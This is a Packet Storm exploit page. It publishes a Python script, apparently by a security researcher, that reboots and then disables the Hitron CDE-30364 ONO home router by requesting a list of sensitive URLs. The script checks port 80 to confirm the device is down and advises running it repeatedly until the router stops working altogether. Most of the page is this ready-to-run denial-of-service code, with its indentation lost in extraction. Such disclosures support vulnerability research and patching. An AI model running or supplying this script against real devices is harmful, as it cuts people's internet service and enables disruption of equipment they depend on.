what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Hitron Technologies CDE-30364 Denial Of Service

Hitron Technologies CDE-30364 Denial Of Service
Posted Aug 6, 2014
Authored by Matias Mingorance Svensson

Hitron Technologies CDE-30364 suffers from a remote reboot / denial of service vulnerability.

tags | exploit, remote, denial of service
SHA-256 | ad8836ddff9830d92e4a6dea9cebe2cef93c73d2629e0d38af158f10c8331d55

Hitron Technologies CDE-30364 Denial Of Service

Change Mirror Download
#!/usr/bin/python

#-----------------------------------------------------------------------------------------

#Description:
#-----------------------------------------------------------------------------------------

#Hitron Technologies CDE-30364 is a famous ONO Router.

#Scanning certain sensitive urls the router is restarted. If you run the
script several times, it stops working.

import httplib
import socket
import time

print
"\n###########################################################################################################"

print "# Exploit Title: Router ONO Hitron CDE-30364 - Remote
reboot #"
print "# Date:
8-10-2013
#"
print "# Exploit Author: Matias Mingorance Svensson -
matias.ms[at]owasp.org
#"
print "# Vendor Homepage:
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/
#"
print "# Tested on: Hitron Technologies
CDE-30364 #"
print "# Version HW:
1A
#"
print "# Version SW:
3.1.0.8-ONO
#"
print
"###########################################################################################################\n"


host = '192.168.1.1'

#Sensitive urls
directories = ['login.asp', 'config.asp', 'reset.asp', 'css',
'css/webONO.css', 'css/ie7ONO.css', 'css/ie6ONO.css', 'js/',
'js/common.js', 'js/dict.js', 'js/hover.js', 'goform/login',
'goform/ConfigCable', 'admin/cable-Systeminfo.asp']

for directory in directories:
conn = httplib.HTTPConnection(host)
conn.request('GET', '/' + directory)
r1 = conn.getresponse()
print r1.status, r1.reason

conn.close()

#Check 80 port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(4)
try:
s.connect((host, 80))
s.shutdown(2)
print "\n"
print "----------------------------------------------------------\n"
print "Attack Fail!\n"
except:
print "----------------------------------------------------------\n"
print "Attack Successful! The router is rebooting!\n"
print "Run the script several times to stop router completely!\n"

--
Un saludo,
Matías Mingorance Svensson
*OWASP Foundation, Open Web Application Security Project*
https://www.owasp.org
http://es.linkedin.com/in/matiasms
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close